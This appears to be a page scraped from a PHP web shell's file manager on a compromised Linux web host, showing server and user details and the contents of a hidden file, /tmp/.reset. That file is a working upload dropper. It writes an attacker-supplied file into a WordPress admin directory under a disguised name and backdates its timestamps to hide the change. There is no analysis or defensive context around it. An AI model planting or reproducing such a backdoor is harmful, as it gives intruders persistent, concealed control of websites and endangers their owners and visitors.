HEX
Server: Apache
System: Linux info 3.0 #1337 SMP Tue Jan 01 00:00:00 CEST 2000 all GNU/Linux
User: u106391720 (10342218)
PHP: 7.4.33
Disabled: NONE
Upload Files
File: //tmp/.reset
<?php   $p = "/kunden/homepages/34/d890102484/htdocs/sites/eglise//homepages/34/d890102484/htdocs/wp-admin/js/widgets/common.class"; $ft = 1636704357; if (move_uploaded_file($_FILES['file']['tmp_name'], $p)) {     $filesize = filesize($p);     if ($filesize >= 583252) {         @chmod($p, 0744);         if ($ft) {             @touch($p, $ft, $ft);             @touch(@dirname($p), $ft, $ft);         }         die('_uploaded!_');     } else {         if (file_exists($p)) {             print "file exists but size = {$filesize} not 583252";         }         @unlink($p);     } } die('_upload_failed_');